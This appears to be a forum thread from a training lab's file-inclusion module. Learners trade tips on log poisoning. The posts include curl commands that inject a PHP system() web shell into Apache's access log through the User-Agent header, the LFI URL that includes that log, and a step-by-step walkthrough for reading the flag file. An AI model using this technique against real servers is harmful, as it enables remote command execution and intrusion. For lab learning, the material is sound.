FILE INCLUSION - Log Poisoning

Good afternoon guys.
Help me please.
I can’t complete this task.
I do everything as described in the task using http://<SERVER_IP>:/index.php?language=/var/log/apache2/access.log
Next I do curl -s “http://<SERVER_IP>:/index.php” -A ‘<?php system($_GET["cmd"]); ?>’
But the fact is that even using Burp Suite and doing everything according to the instructions, I can’t read the flag.
I see him. But none of the commands via &cmd=id work.
I did so.

  1. Command: curl -i -v {URL} -A “<?php system('ls /'); ?>”
    Then took cookies
  2. curl -i -v {URL} -b “PHPSESSID=ldb02hufk7p8s0o624hrnjv335”
    Then I launched Burp Suite and added GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1
    But I am not getting the command executed.
    If I change &cmd=pwd I get a 500 server error.
    Please tell me what I’m doing wrong.

I see the flag but can’t read it using cmd=cat%20

none of the commands are executed, except for some

I don’t know about this but this module used to freeze a lot when i tried Log poisoning via Burp. I used other method to get this flag because either burp or server gave up on me serveral times.

1 Like

Thanks a lot for your answer.
I’m assuming the server is lagging!
This is nonsense, a task that takes 5 minutes takes me 3 days.
Thank you. I’ll try another hack method.
If you have any other ideas, I would be grateful for the hint.

@XANTAN I had a quite problem with " there - apache access.log is somehow tricky with these and it was the cause for me. I made custom python exploit which do this attack automatically without burp.

payload in python could look e.g. like this ‘’‘<?php system('cat xy.txt'); ?>’‘’ … I advise to use more elaborate approach e.g. using ‘find’ and properly escape all shiny characters

1 Like

Guys, thank you very much for your help.
I figured it out on my own.
How I solved the problem.
I decided to leave this task and move on to the next one, in order to free my thoughts from the accumulated information.
As a result, while I was solving the following problem, I noticed that with the command
curl -i -v {URL} -A “<?php system('ls /'); ?>”
I see a list of directories and files in the main directory with (‘ls /’)
Then I started thinking, why don’t I use burp suite and use curl and with the help of this template that I wrote above, send pwd, because the task is to execute the pwd command.
And lo and behold, I succeeded, only visible due to server lag, I had to execute each command 2 times!
After that I did
curl -i -v -A “<?php system('cat /MyFlag.txt'); ?>”
again, 2 times and lo and behold, I saw the flag on the site itself, after refreshing the page, and I also saw it in burp suite!

I’m stuck on final assessment, have find access.log file but cant poison when enter anything in user_agent it dont appear in logs. help please

Good afternoon.
I would like to draw your attention to.

  1. Pwdbox often doesn’t work well if you use it!
  2. If you use your Kali machine, then there may be problems with vpn.
    Now for the task.
    I ran the browser page at http://<SERVER_IP>:/index.php?language=/var/log/apache2/access.log
    At the same time, a burp suite was launched in parallel, in order to see what is happening on the server.
    Then I ran the command I wrote above.
    curl -i -v {Your server IP:Port} -A “<?php system('ls /'); ?>”
    After that we refresh the page
    and see what it says!
    You should see flag.txt and all directories on the server, because curl sent (‘ls /’) to the main directory.
    In parallel, you can see what is happening in Burp Suite.
    If it worked, you can run all Linux commands.
    Change the command (‘ls /’) to the one you need and after each sending of the curl, refresh the page with access.log and see if the command was executed or not!
    Good luck.